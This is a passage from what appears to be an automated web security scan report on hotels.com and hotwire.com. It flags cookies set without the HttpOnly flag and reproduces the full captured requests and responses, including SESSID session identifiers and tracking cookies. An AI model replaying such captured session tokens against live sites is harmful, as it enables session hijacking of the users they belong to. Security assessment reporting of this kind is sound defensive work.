ntCoent-Length: 150
Expect:
Content-Type: text/html;charset=utf-8
Content-Length: 150
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:28:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6OTguNi40OjE0Mi4wLjAuaTQ6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjAuMC5pMToxMjEuNTAzLjAuaTc6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:41 GMT; Path=/

<span id="sense_of_urgency_close" class="blue" title="Close popup"></span>
<p>
This hotel has been booked 13 times in the last 24 hours</p>
14.249. http://www.hotels.com/html/blank.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /html/blank.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html/blank.html HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Cteonnt-Length: 152
Expect:
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 152
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSPV=usAAAAAAAAAAAAAAAAAAAAAAAAsAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:08 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title></title></head><body><p></p></body></html>
14.250. http://www.hotels.com/html/tealeaf.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /html/tealeaf.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /html/tealeaf.html HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
Content-Length: 1348
Origin: http://www.hotels.com
X-TeaLeaf-Page-Img-Fail: 36
X-TeaLeaf-Page-Render: 63175
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2011.07.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /search.do
Accept: */*
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; SSPV=I8AAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAA; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

<ClientEventSet PostTimeStamp="1317600763816" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="63175" DateSince1970="1317600617958" PageId="ID19H9M14S783R0.4504159395582974" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Cteonnt-Length: 152
Expect:
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=0, proxy-revalidate
Content-Length: 152
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:13:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:13:44 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title></title></head><body><p></p></body></html>
14.251. http://www.hotels.com/search.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotels&grp=9702&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B222113440%3B45762978%3Bg%3Fhttp%3A%2F%2Fwww.hotels.com%2FPPCSearch%3Fcity%3D%24%7Bcity%7D%2C%24%7Bstate%7D%26arrivalDate%3D%24%7BdepartureDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26adultsPerRoom%3D2%26numberOfRooms%3D%24%7Brooms%7D%26departureDate%3D%24%7BreturnDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26PSRC%3DIGOUGO%26rffrid%3Dmdp.hcom.US.138.160.02&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=150&pos=3&aii=2fc59ddf-790d-4415-832a-eafa2c6a46cb&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; user=QSplbl9VU3xIQ09NX1VT

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:04 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=ZgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:04 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMTo5Ny43My4xLmkzOjk4LjYuNDoxMzcuMC4wLmkyOjE0NS4wLjAuaTI6MTA4LjEuMC5pMjoxNTIuMC4wLmkyOjIuMi4xOjE5Ni4xLjA6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEzOC4xLjA6MTk1LjAuMDoxMDQuMC4xfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Content-Length: 368925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
14.252. http://www.hotels.com/search/search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search/search.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; SSLB=1; SSPV=PfwAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A130.1.1.i2%3A103.4.1.i6%3A171.1.0%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//"; user=RCoxODUuMC4wLmkxOjExNC4xLjA6MTI0LjEuMC5pMToxMzAuMS4xLmkyOjEwMy40LjEuaTY6MTcxLjEuMDo0OC4xLjA6OTcuNzMuMS5pMzo5OC42LjQ6MTQyLjAuMC5pNDoxOTguMi4wOjE0NS4wLjAuaTI6MjAwLjAuMDoxMzcuMC4wLmkyOjEwOC4xLjAuaTI6MTkwLjMuMDoxNTIuMC4wLmkyOjEzNC4wLjE6MTk2LjEuMDoyLjIuMToyMDkuMC4xOjE0Ny42LjAuaTY6OTIuMC4wLmkxOjEyMS41MDMuMC5pNzoxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTM4LjEuMDoxNDkuMC4wLmkxOjEwNC4wLjE6MTk1LjAuMHxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDIhRio.

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:34 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=DvwAAAAAAAEAAAAAAAAAAAAAAAMAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:34 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A84.0.0.i2%3A98.6.4%3A142.0.0.i4%3A119.0.2.i2%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A78.0.1%3A147.0.1.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A184.0.0.i1%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6ODQuMC4wLmkyOjk4LjYuNDoxNDIuMC4wLmk0OjExOS4wLjIuaTI6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMTo3OC4wLjE6MTQ3LjAuMS5pNjo5Mi4wLjAuaTE6MTIxLjUwMy4wLmk3OjEzMi4yLjAuaTI6MTg0LjAuMC5pMToxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Content-Length: 371034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
14.253. http://www.hotels.com/selectors/en_US/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /selectors/en_US/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /selectors/en_US/ HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; SSLB=1; SSPV=LTwAAAAAAAEAAAAAAAAAAAAAAAEAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMSUzQTExNC4xLjAlM0ExMjQuMS4wLmkxJTNBMTAzLjQuMS5pNiUzQTE3MS4xLjAlM0ExMzAuMS4xLmkyJTNBNDguMS4wJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTE0Mi4wLjAuaTQlM0ExOTguMi4wJTNBMTQ1LjAuMC5pMiUzQTIwMC4wLjAlM0ExMzcuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE5MC4zLjAlM0ExNTIuMC4wLmkyJTNBMTM0LjAuMSUzQTE5Ni4xLjAlM0EyLjIuMSUzQTIwOS4wLjElM0ExNDcuNi4wLmk2JTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTMyLjIuMC5pMiUzQTEyMi4xLjAuaTMlM0ExMzguMS4wJTNBMTQ5LjAuMC5pMSUzQTEwNC4wLjElM0ExOTUuMC4wJTdDSENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:44 GMT
Content-Length: 36464
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:44 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A84.0.0.i2%3A98.6.4%3A142.0.0.i4%3A119.0.2.i2%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A78.0.1%3A147.0.1.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A184.0.0.i1%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:44 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6ODQuMC4wLmkyOjk4LjYuNDoxNDIuMC4wLmk0OjExOS4wLjIuaTI6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMTo3OC4wLjE6MTQ3LjAuMS5pNjo5Mi4wLjAuaTE6MTIxLjUwMy4wLmk3OjEzMi4yLjAuaTI6MTg0LjAuMC5pMToxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:44 GMT; Path=/

<headerFooterAdditionalData>
<languageSelectorContent>
<group id="site_group_africa_middle_east">
<![CDATA[
<div class="heading">Africa/Middle East</div>
<ul>

...[SNIP]...
14.254. http://www.hotwire.com/hotel/results.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /hotel/results.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/results.jsp?searchTokenId=1 HTTP/1.1
Host: www.hotwire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
